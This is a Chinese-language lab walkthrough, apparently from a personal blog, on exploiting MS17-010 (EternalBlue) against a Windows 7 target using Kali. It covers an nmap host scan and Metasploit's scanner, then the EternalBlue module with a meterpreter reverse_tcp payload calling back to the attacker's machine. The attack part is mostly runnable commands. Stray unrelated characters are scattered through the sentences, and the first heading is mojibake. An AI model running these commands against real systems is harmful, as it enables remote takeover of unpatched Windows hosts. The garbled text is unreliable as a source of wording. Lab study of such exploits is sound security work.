1. 實驗?zāi)康?/h1>
利用ms17-010漏洞獲得靶機(一個存在漏洞的系統(tǒng))權(quán)限。
2. 實驗原理
利用了微軟 Microsoft Windows SMB 服務(wù)器通信協(xié)議婆廊。
SMB主要用來使得一個網(wǎng)絡(luò)上的機器共享計算機文件蒲祈、打印機功戚、串行端口和通訊等資源。它也提供認(rèn)證的行程間通訊機能。使用445端口景东。
攻擊者利用445端口發(fā)送特殊設(shè)計的消息吞琐,來遠(yuǎn)程執(zhí)行攻擊代碼捆探。
3. 準(zhǔn)備
一臺靶機(win7),一臺攻擊機(kali)
4. 過程
1. 設(shè)置掃描ip
先推算ip站粟,設(shè)置攻擊機和靶機在同一網(wǎng)段黍图。
Kali機設(shè)置(有兩種方法):
① vim /etc/network/interfaces
更改完后記得重啟網(wǎng)卡。
② ip addr add 你的ip地址/24 dev eth0
使用nmap掃描網(wǎng)段內(nèi)存活的主機:
nmap -sP + 網(wǎng)段
掃描到兩臺機子奴烙,一臺是我們的攻擊機助被,133是我們的win7靶機。
2. 使用msf攻擊
啟動msf:msfconsole
(ps:會出現(xiàn)的圖像隨機切诀,不影響操作)
查找ms17-010模塊:search ms17-010
使用use調(diào)用模塊測試:use auxiliary/scanner/smb/smb_ms17_010
設(shè)置檢測對象:set rhosts 192.168.1.133
(剛才掃描出的靶機ip揩环,這里用133做試驗)
查看配置信息:show options
可以看到,rhost已經(jīng)設(shè)置成功幅虑。
這時候可以運行了丰滑,使用run或者exploit。
上面寫著’host is likely vulnerable to ms17-010’翘单,表示這臺靶機可利用ms17-010漏洞攻擊吨枉。
現(xiàn)在調(diào)用攻擊模塊:use exploit/windows/smb/ms17_010_eternalblue
后面的操作還是一樣設(shè)置rhost蹦渣。不過這次要設(shè)置lhost(就是你攻擊機的ip地址)和payload。
使用show options查看設(shè)置貌亭。
set rhost 192.168.1.133
set lhost 192.168.1.24
set payload windows/x64/meterpreter/reverse_tcp
show options
run
成功柬唯!
5.參考
http://ourjs.com/detail/59172166f12390061496168f
https://blog.csdn.net/qq_37053007/article/details/88327077
https://blog.csdn.net/qq_36197704/article/details/82458557
https://blog.csdn.net/qq_41880069/article/details/82908293
——————————————————————————————
這里是soya
郵箱:1057851022@qq.com
個人博客地址:https://soyawww.github.io
歡迎各位交流探討哦!